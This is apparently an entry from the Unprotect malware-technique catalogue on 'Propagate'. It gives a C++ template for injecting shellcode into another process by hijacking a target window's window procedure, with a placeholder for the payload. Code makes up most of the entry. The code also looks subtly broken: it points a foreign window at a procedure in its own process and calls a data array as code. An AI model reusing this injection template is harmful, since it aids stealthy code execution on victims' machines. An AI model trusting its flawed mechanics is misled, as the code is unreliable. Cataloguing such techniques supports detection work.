(C++) Propagate by Unprotect

Created the Thursday 29 December 2022. Updated 1 month ago.

Description:

This code snippet first obtains the handle of the target window using the FindWindow function. It then retrieves the original window procedure for the target window using the GetWindowLongPtr function. Next, it sets the window subclassing callback function using the SetWindowLongPtr function. When a message is sent to the target window, the callback function will be executed, and it will execute the shellcode and call the original window procedure.

Code

            #include <windows.h>

// Function prototype for the shellcode to be injected
typedef void (*ShellcodeFunc)(void);

// The shellcode to be injected into the target process
unsigned char shellcode[] = {
    // Insert shellcode here
};

// The original window procedure for the target window
WNDPROC originalWndProc;

// The window subclassing callback function
LRESULT CALLBACK SubclassProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
    // Execute the shellcode
    ((ShellcodeFunc)shellcode)();

    // Call the original window procedure
    return CallWindowProc(originalWndProc, hwnd, uMsg, wParam, lParam);
}

int main()
{
    // Get the handle of the target window
    HWND hwnd = FindWindow(NULL, "Target Window Title");
    if (hwnd == NULL)
        return 1;

    // Get the window procedure for the target window
    originalWndProc = (WNDPROC)GetWindowLongPtr(hwnd, GWLP_WNDPROC);
    if (originalWndProc == NULL)
        return 1;

    // Set the window subclassing callback function for the target window
    SetWindowLongPtr(hwnd, GWLP_WNDPROC, (LONG_PTR)SubclassProc);

    return 0;
}